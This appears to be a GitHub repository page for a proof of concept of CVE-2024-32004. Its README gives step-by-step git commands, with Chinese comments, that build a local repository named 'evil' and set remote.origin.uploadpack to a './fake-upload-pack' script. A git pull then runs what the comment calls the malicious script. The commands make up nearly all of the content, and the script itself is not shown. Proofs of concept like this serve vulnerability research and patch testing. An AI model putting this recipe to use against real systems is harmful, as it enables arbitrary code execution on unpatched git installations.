Skip to content

Wadewfsssss/CVE-2024-32004

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

创建 tmp 仓库,设置uploadpack.allowfilter为true

git init tmp

git -C tmp config uploadpack.allowfilter 1

从 tmp 仓库 克隆 evil

git clone --filter=blob:none --no-local --no-checkout tmp evil

rm -rf tmp

配置远程过滤脚本

git -C evil config remote.origin.uploadpack "./fake-upload-pack"

执行恶意脚本

git pull

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages